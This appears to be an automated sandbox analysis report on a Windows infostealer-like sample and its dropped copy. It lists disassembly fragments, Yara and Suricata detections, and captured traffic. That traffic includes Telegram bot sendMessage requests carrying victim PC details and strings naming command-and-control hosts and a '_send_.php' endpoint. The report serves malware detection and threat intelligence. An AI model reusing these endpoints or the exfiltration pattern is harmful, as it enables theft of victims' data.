Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Code function: 4x nop then jmp 06CC31E0h	14_2_06CC310E
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 01482C19h	20_2_01482968
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 014831E0h	20_2_01482DC8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 01480D0Dh	20_2_01480B30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 01481697h	20_2_01480B30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148E501h	20_2_0148E258
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148D7F9h	20_2_0148D550
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 014831E0h	20_2_0148310E
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148DC51h	20_2_0148D9A8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_01480040
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_01480853
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148FAB9h	20_2_0148F810
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148D3A1h	20_2_0148D0F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148CF49h	20_2_0148CCA0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148F209h	20_2_0148EF60
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148EDB1h	20_2_0148EB08
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148F661h	20_2_0148F3B8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	20_2_01480673
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148E0A9h	20_2_0148DE00
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 0148E959h	20_2_0148E6B0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AE816h	20_2_015AE548
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A7EB5h	20_2_015A7B78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A79C9h	20_2_015A7720
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A9280h	20_2_015A8FB0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AC826h	20_2_015AC558
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A0FF1h	20_2_015A0D48
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AECA6h	20_2_015AE9D8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A18A1h	20_2_015A15F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015ACCB6h	20_2_015AC9E8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A1449h	20_2_015A11A0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A02E9h	20_2_015A0040
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A3709h	20_2_015A3460
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A32B1h	20_2_015A3008
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015ABF06h	20_2_015ABC38
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A62D9h	20_2_015A6030
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015ADEF6h	20_2_015ADC28
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AC396h	20_2_015AC0C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A0B99h	20_2_015A08F0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A0741h	20_2_015A0498
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A6733h	20_2_015A6488
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then mov esp, ebp	20_2_015AB081
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AE386h	20_2_015AE0B8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A2A01h	20_2_015A2758
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AB5E6h	20_2_015AB318
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AD5D6h	20_2_015AD308
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A25A9h	20_2_015A2300
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A55D1h	20_2_015A5328
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A5E81h	20_2_015A5BD8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015ADA66h	20_2_015AD798
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AFA56h	20_2_015AF788
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A5A29h	20_2_015A5780
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A2E59h	20_2_015A2BB0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015ABA76h	20_2_015AB7A8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A1CF9h	20_2_015A1A50
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A4D21h	20_2_015A4A78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AD146h	20_2_015ACE78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A7119h	20_2_015A6E70
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AF136h	20_2_015AEE68
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A6CC1h	20_2_015A6A18
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A48C9h	20_2_015A4620
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A5179h	20_2_015A4ED0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A7571h	20_2_015A72C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015AF5C6h	20_2_015AF2F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 015A2151h	20_2_015A1EA8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	20_2_01660DD0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	20_2_01660C9E
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	20_2_016610E6
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then push 00000000h	20_2_01665487
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 032EF45Dh	20_2_032EF2C0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 032EF45Dh	20_2_032EF4AC
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 4x nop then jmp 032EFC19h	20_2_032EF974

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49714 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49732 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49741 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49752 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49788 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49753 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49809 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49724 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49716 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:28:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506407%0D%0ADate%20and%20Time:%2006/12/2024%20/%2019:17:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506407%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: kashmirestore.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 05 Dec 2024 17:51:39 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 05 Dec 2024 17:51:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3695367843.0000000000430000.00000040.00000400.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
